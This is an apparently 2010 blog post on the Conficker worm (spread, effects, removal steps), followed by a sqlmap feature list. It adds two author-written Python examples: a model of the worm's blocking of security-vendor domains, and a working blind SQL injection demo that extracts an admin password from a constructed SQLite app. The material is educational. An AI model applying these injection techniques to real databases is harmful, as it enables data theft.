Monday, April 5, 2010

Conficker Computer Worm


The decade's biggest innovation from the hacking underground was the botnet, and the biggest botnet of them all was Conficker. The mainstream press predicted that Conficker would destroy the internet. It did not, but packing state-of-the-art encryption and a sophisticated peer-to-peer update mechanism, Conficker tantalized security researchers and resisted attempts at eradication, inhabiting at its peak as many as 15 million unpatched Windows boxes, mostly in China and Brazil.
The Conficker worm is a computer worm that infects a computer and spreads itself to other computers across a network automatically, without human interaction. Experts believe it is the work of an organized team of coders, and there are hints that it originated in Ukraine. Like most of the hacking coming out of Eastern Europe, the software has a profit motive: it has been seen sending spam and serving victims a fake antivirus product that offers to remove malware for $49.95. Dude. It used to be about the mayhem.
Here is some information worth having to stay safe from the Downadup worm. I found it on the Norton website and thought it worth sharing.
The Conficker worm, sometimes called Downadup or Kido, has managed to infect a large number of computers. Specifics are hard to come by, but some researchers estimate that millions of computers have been infected with this threat since January 2009. If you are unable to reach your security suite's web site, you may be infected. In that case you will need to get to a computer that is not infected, download a specialized Conficker removal tool and run it on the infected machine before installing new antivirus software. Symantec has a detailed technical analysis of the threat.
[youtube=http://www.youtube.com/watch?v=r2h6w61-c74]

What does the Conficker worm do?

The Conficker worm has created a secure infrastructure for cybercrime. The worm allows its creators to remotely install software on infected machines. What will that software do? We don't know. Most likely the worm will be used to create a botnet that is rented out to criminals who want to send spam, steal identities and direct users to online scams and phishing sites.
The Conficker worm mostly spreads across networks. If it finds a vulnerable computer, it turns off the automatic backup service, deletes previous restore points, disables many security services, blocks access to a number of security web sites (by failing DNS lookups for names that contain security vendor strings) and opens the infected machine to receive additional programs from the malware's creator. The worm then tries to spread itself to other computers on the same network.
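As an added illustration (my own code, not the worm's and not from the Norton text), here is a small Python model of that site-blocking behaviour together with the "can I still reach my security vendor?" check the text relies on. The substring list is a constructed partial subset drawn from public analyses of the worm, not its complete list, and the vendor and control host names are my assumptions; the check uses unrelated control names so that a plain DNS outage is not mistaken for an infection.

```python
import socket

# Constructed partial subset of the substrings the worm matches against every
# name being resolved (assumption: drawn from public analyses, not complete).
BLOCKED_SUBSTRINGS = (
    "microsoft", "windowsupdate", "symantec", "norton", "mcafee", "trendmicro",
    "sophos", "kaspersky", "f-secure", "avira", "avast", "eset", "nod32",
    "virus", "malware", "spyware", "rootkit",
)


def is_blocked(hostname):
    """Case-insensitive substring match: the worm keeps no exact list of sites,
    so any name that merely contains a vendor string fails as well."""
    host = hostname.lower()
    return any(s in host for s in BLOCKED_SUBSTRINGS)


def infected_resolver(real_resolver):
    """Wrap a resolver the way the worm's lookup hook does: blocked names fail
    as if they did not exist, everything else resolves normally."""
    def resolve(hostname):
        if is_blocked(hostname):
            raise socket.gaierror("Name or service not known")
        return real_resolver(hostname)
    return resolve


# Assumed host lists for the check: vendor names the worm blocks, and control
# names it leaves alone.
VENDOR_HOSTS = ("www.symantec.com", "update.microsoft.com", "www.mcafee.com", "www.sophos.com")
CONTROL_HOSTS = ("www.example.com", "www.wikipedia.org")


def reachability_check(resolver=socket.gethostbyname):
    """Resolve vendor and control names. 'blocked': vendors fail while controls
    resolve (the worm's signature); 'offline': everything fails (ordinary DNS
    trouble); otherwise 'ok'."""
    def resolves(host):
        try:
            resolver(host)
            return True
        except OSError:          # socket.gaierror is a subclass of OSError
            return False
    vendors_ok = any(resolves(h) for h in VENDOR_HOSTS)
    controls_ok = any(resolves(h) for h in CONTROL_HOSTS)
    if not vendors_ok and controls_ok:
        return "blocked"
    if not vendors_ok and not controls_ok:
        return "offline"
    return "ok"
```

Run `reachability_check()` on a suspect machine with the real resolver; pass a different resolver to test the logic without a network, as the worm hook above shows.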

How does the worm infect a computer?

The Downadup worm tries to take advantage of a problem with Windows (a vulnerability) called MS08-067, a remote code execution flaw in the Windows Server service that Microsoft patched in October 2008, to quietly install itself. Users who automatically receive updates from Microsoft are already protected from this. The worm also tries to spread by copying itself to shared folders on networks, guessing weak passwords where it has to, and by infecting USB devices such as memory sticks with an autorun.inf file that launches it when the device is plugged in.

Who is at risk?

Users whose computers are not configured to receive patches and updates from Microsoft, and who are not running an up-to-date antivirus product, are most at risk. Users who do not have a genuine version of Windows are also at high risk, since pirated systems usually cannot get Microsoft updates and patches.

What to do if you are infected

If you can still reach security vendor web sites, your computer is probably not infected with Conficker, as the worm blocks access to most of them.
If you have a computer that is infected, use an uninfected computer to download a specialized Conficker removal tool. The tool is available here:
Or, you can restore access to security web sites on an infected machine by stopping the Windows DNS Client service, which bypasses the hooked lookup path the worm uses to filter name lookups:
  1. Click Start > Run.
  2. In the Run box, type the following: cmd
  3. Click OK.
  4. At the command prompt, type the following and press Enter: net stop dnscache
     (The prompt's current directory does not matter, so there is no need to cd.. up to C:\> first.)
  5. This disables the domain blocking feature of Conficker and you should now be able to reach security web sites. The service starts again at the next reboot, so download and run the removal tool before restarting.
You should now be able to download the Conficker removal tool here.

    sqlmap: open source penetration testing tool

    sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over back-end database servers. It comes with a broad range of features ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

    [youtube=http://www.youtube.com/watch?v=EVjonzEWOVw]

    sqlmap features

    Features implemented in sqlmap include:

    Generic features

    • Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server back-end database management systems. Besides these four database management systems software, sqlmap can also identify Microsoft Access, DB2, Informix, Sybase and Interbase.
    • Full support for three SQL injection techniques: inferential (boolean-based) blind SQL injection, UNION query (inband) SQL injection and stacked (batched) queries. sqlmap can also test for time-based blind SQL injection.
    • It is possible to provide a single target URL, get the list of targets from a Burp proxy request log file or a WebScarab proxy conversations/ folder, get the whole HTTP request from a text file, or get the list of targets by providing sqlmap with a Google dork, which queries the Google search engine and parses its results page. You can also define a regular-expression based scope that is used to select which of the parsed addresses to test.
    • Automatically tests all provided GET parameters, POST parameters, HTTP Cookie header values and the HTTP User-Agent header value to find the dynamic ones, meaning those whose value changes the content of the HTTP response. On the dynamic ones sqlmap automatically tests for and detects SQL injection. Each dynamic parameter is tested as numeric, as a single-quoted string and as a double-quoted string, each with zero to two enclosing parentheses, to work out the syntax of the SELECT statement it lands in and so build further injections correctly. It is also possible to specify only the parameter(s) that you want to test and use for injection.
    • Option to specify the maximum number of concurrent HTTP requests to speed up the inferential blind SQL injection algorithms (multi-threading). It is also possible to specify the number of seconds to wait between each HTTP request.
    • HTTP Cookie header string support, useful when the web application requires authentication based upon cookies and you have such data or in case you just want to test for and exploit SQL injection on such header. You can also specify to always URL-encode the Cookie header.
    • Automatically handles the HTTP Set-Cookie header from the application, re-establishing the session if it expires. Testing and exploiting these values is supported too. You can also force it to ignore any Set-Cookie header.
    • HTTP Basic, Digest, NTLM and Certificate authentications support.
    • Anonymous HTTP proxy support to route requests to the target application, which also works with HTTPS requests.
    • Options to fake the HTTP Referer header value and the HTTP User-Agent header value, either specified by the user or randomly selected from a text file.
    • Support to increase the verbosity level of output messages: there exist six levels. The default level is 1 in which information, warnings, errors and tracebacks (if any occur) will be shown.
    • Granularity in the user’s options.
    • Estimated time of arrival for each query, updated in real time while fetching the information, to give the user an overview of how long it will take to retrieve the output.
    • Automatically saves the session (queries and their output, even if only partially retrieved) to a text file in real time while fetching the data, so the injection can be resumed from that file later.
    • Support to read options from a configuration INI file rather than specify each time all of the options on the command line. Support also to save command line options on a configuration INI file.
    • Option to update sqlmap as a whole to the latest development version from the Subversion repository.
    • Integration with other IT security open source projects, Metasploit and w3af.
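The two bullets above on inferential blind injection and on testing each dynamic parameter as numeric, single-quoted and double-quoted with enclosing parentheses describe the core of what the tool does. The following Python is an added example of my own, not sqlmap's code: a constructed in-memory SQLite "web application" with two injectable parameters, the boundary search that finds which quoting context each parameter lands in, the boolean oracle that results, and the character-by-character extraction of a secret through it. The same application with bound parameters is scanned alongside to show that the detection finds nothing when the bug is fixed. Only zero and one parenthesis are tried here (sqlmap goes to two); the table, column and host names are assumptions.

```python
import sqlite3

# Constructed target: an in-memory SQLite database standing in for the back end.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE products(id INTEGER, name TEXT, category TEXT);
INSERT INTO products VALUES (1,'Widget','tools'),(2,'Gizmo','tools'),(3,'Sprocket','parts');
CREATE TABLE users(name TEXT, password TEXT);
INSERT INTO users VALUES ('admin','s3cret!');
""")
ORIG = {"id": "1", "category": "tools"}   # the request being tested: ?id=1&category=tools


def page(id_, category, safe=False):
    """The 'web page'. Unsafe: input concatenated into SQL (the bug a scanner
    looks for). Safe: bound parameters, so the same inputs are only data."""
    try:
        if safe:
            rows = _db.execute("SELECT name FROM products WHERE id = ? AND category = ?",
                               (id_, category)).fetchall()
        else:
            rows = _db.execute("SELECT name FROM products WHERE id = %s AND category = '%s'"
                               % (id_, category)).fetchall()
    except sqlite3.Error:
        return "500 Internal Server Error"
    return "Products: " + ", ".join(r[0] for r in rows) if rows else "No results"


def request(param, value, safe=False):
    """One request with a single parameter replaced by a test value."""
    params = dict(ORIG, **{param: value})
    return page(params["id"], params["category"], safe)


# (label, prefix, suffix): the prefix closes the original literal or parenthesis,
# the suffix re-opens it so the remainder of the server's statement still parses.
BOUNDARIES = [
    ("numeric",                "",   ""),
    ("numeric, 1 paren",       ")",  " AND (1=1"),
    ("single-quoted",          "'",  " AND 'a'='a"),
    ("single-quoted, 1 paren", "')", " AND ('a'='a"),
    ("double-quoted",          '"',  ' AND "a"="a'),
]


def is_dynamic(param, safe=False):
    """A parameter is only worth testing if changing it changes the page."""
    return request(param, ORIG[param], safe) != request(param, ORIG[param] + "9", safe)


def find_injection(param, safe=False):
    """Return the boundary under which `param` is boolean-blind injectable, else None.
    A boundary fits when AND 1=1 leaves the page unchanged but AND 1=2 changes it;
    a boundary that breaks the syntax changes both responses and is rejected."""
    if not is_dynamic(param, safe):
        return None
    true_page = request(param, ORIG[param], safe)
    for boundary in BOUNDARIES:
        _, prefix, suffix = boundary
        if (request(param, f"{ORIG[param]}{prefix} AND 1=1{suffix}", safe) == true_page
                and request(param, f"{ORIG[param]}{prefix} AND 1=2{suffix}", safe) != true_page):
            return boundary
    return None


def oracle(param, boundary, cond):
    """True iff injecting `cond` leaves the page unchanged, i.e. the condition held."""
    _, prefix, suffix = boundary
    return request(param, f"{ORIG[param]}{prefix} AND {cond}{suffix}") == request(param, ORIG[param])


def blind_extract(param, boundary, expr, max_len=64):
    """Inferential extraction: learn the length of `expr`, then each character by
    bisecting its code point (about 7 requests per character instead of up to 95)."""
    def ask(cond):
        return oracle(param, boundary, cond)
    lo, hi = 0, max_len                          # invariant: lo <= length <= hi
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"length({expr})>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    length, out = lo, ""
    for i in range(1, length + 1):
        lo, hi = 32, 126                         # printable ASCII; same invariant
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"unicode(substr({expr},{i},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo():
    """Scan both parameters of the unsafe and safe pages; read a password via `id`."""
    found = {p: find_injection(p) for p in ORIG}
    secret = blind_extract("id", found["id"], "(SELECT password FROM users WHERE name='admin')")
    return {"id": found["id"][0], "category": found["category"][0],
            "safe": {p: find_injection(p, safe=True) for p in ORIG}, "password": secret}
```

Calling `demo()` reports the numeric boundary for `id`, the single-quoted boundary for `category`, no injection at all against the parameterized version, and the admin password recovered without a single row ever being echoed by the page. The SQLite-specific functions (`unicode`, `substr`, `length`) are where a real tool's per-DBMS payload tables come in.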

    [youtube=http://www.youtube.com/watch?v=NFmAdluw4GI&feature=related]

    Fingerprint and enumeration features

    • Extensive back-end database software version and underlying operating system fingerprint based upon inband error messages, banner parsing, functions output comparison and specific features such as MySQL comment injection. It is also possible to force the back-end database management system name if you already know it.
    • Basic web server software and web application technology fingerprint.
    • Support to retrieve the DBMS banner, session user and current database information. The tool can also check if the session user is a database administrator (DBA).
    • Support to enumerate database users, users’ password hashes, users’ privileges, databases, tables and columns.
    • Support to dump database tables as a whole or a range of entries as per user’s choice. The user can also choose to dump only specific column(s).
    • Support to automatically dump all databases' schemas and entries. It is possible to exclude the system databases from the dump.
    • Support to enumerate and dump all databases’ tables containing user provided column(s). Useful to identify for instance tables containing custom application credentials.
    • Support to run custom SQL statement(s) as in an interactive SQL client connecting to the back-end database. sqlmap automatically dissects the provided statement, determines which technique to use to inject it and how to pack the SQL payload accordingly.

    Download:

    Click here to download